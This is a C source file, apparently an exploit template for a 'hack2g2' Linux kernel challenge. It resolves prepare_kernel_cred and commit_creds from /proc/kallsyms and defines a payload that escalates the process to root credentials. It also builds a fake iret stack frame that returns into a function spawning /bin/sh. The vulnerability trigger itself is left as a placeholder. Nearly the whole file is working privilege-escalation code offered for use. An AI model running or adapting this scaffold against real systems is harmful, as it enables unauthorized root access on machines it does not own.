exploit-template.c

/****************************************************
 * 
 * File Name 		:exploit.c
 * Created by		:Guillaume Francqueville
 * Creation date	:septembre 07th, 2016
 * Last changed by 	:Guillaume Francqueville 
 * Last change 		:septembre 24th, 2016 16:09
 * Description		:hack2g2 kenerle exploit
 *
****************************************************/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
#include <stdint.h>
#include <sys/user.h>

struct fake_frame {  
    void *eip;         // shell()
    uint32_t cs;       // %cs
    uint32_t eflags;   // eflags
    void *esp;         // %esp
    uint32_t ss;       // %ss
} __attribute__((packed)) ff;

void* (*prepare_kernel_cred)(void*)  __attribute__((regparm(3)));  
void* (*commit_creds)(void*) __attribute__((regparm(3)));

void shell(void) {
  execl("/bin/sh", "sh", 0);
}

void payload(void) {  
    commit_creds(prepare_kernel_cred(0));    
    asm("mov $ff, %esp;"
	"iret;");
}

/*
 * Setup the fake frame
 * |ss     | Lower
 * |esp    |
 * |eflags |
 * |cs     |
 * |eip    |
 */
void setup_ff(void) {  
    asm("pushl %cs;  popl ff+4;"
        "pushfl;     popl ff+8;"
	"pushl %esp; popl ff+12;"
        "pushl %ss;  popl ff+16;");
    ff.eip = &shell;
    ff.esp -= 1024;

    fprintf(stdout,"ff.eip : %x\n",ff.eip);
    fprintf(stdout,"ff.cs : %x\n",ff.cs);
    fprintf(stdout,"ff.eflags : %x\n",ff.eflags);
    fprintf(stdout,"ff.esp : %x\n",ff.esp);
    fprintf(stdout,"ff.ss : %x\n",ff.ss);

}

int main(int argc, char ** argv){
  FILE* f;
  int i;
  char yeah[50];
  FILE* fd;
  int ret = 0;
  unsigned long addr;
  char dummy;
  char sname[512];
  
  fprintf(stdout,"[+] launching exploit\n");
  
  // Get needed addresses
  fd = fopen("/proc/kallsyms", "r");
  if(fd == NULL) {
    perror("fopen()");
    return -1;
  }
  while(ret != EOF) {
    ret = fscanf(fd, "%p %c %sn", (void **)&addr, &dummy, sname);
    if(prepare_kernel_cred && commit_creds)
      break;
    else
      if(!strncmp(sname, "prepare_kernel_cred", 512))
	prepare_kernel_cred = (void*)addr;
      else
        if(!strncmp(sname, "commit_creds", 512))
	  commit_creds = (void*)addr;
  }
  fclose(fd);
  
  fprintf(stdout, "[+] commit_creds at %p\n", commit_creds);
  fprintf(stdout, "[+] prepare_kernel_cred %p\n", prepare_kernel_cred);
  

  fprintf(stdout,"[+] payload at : %x\n",&payload);

  // setup fake frame
  fprintf(stdout, "[+] preparing fake frame\n");
  setup_ff();
  
  /** PWN HERE PLZ **/


  return 0;
}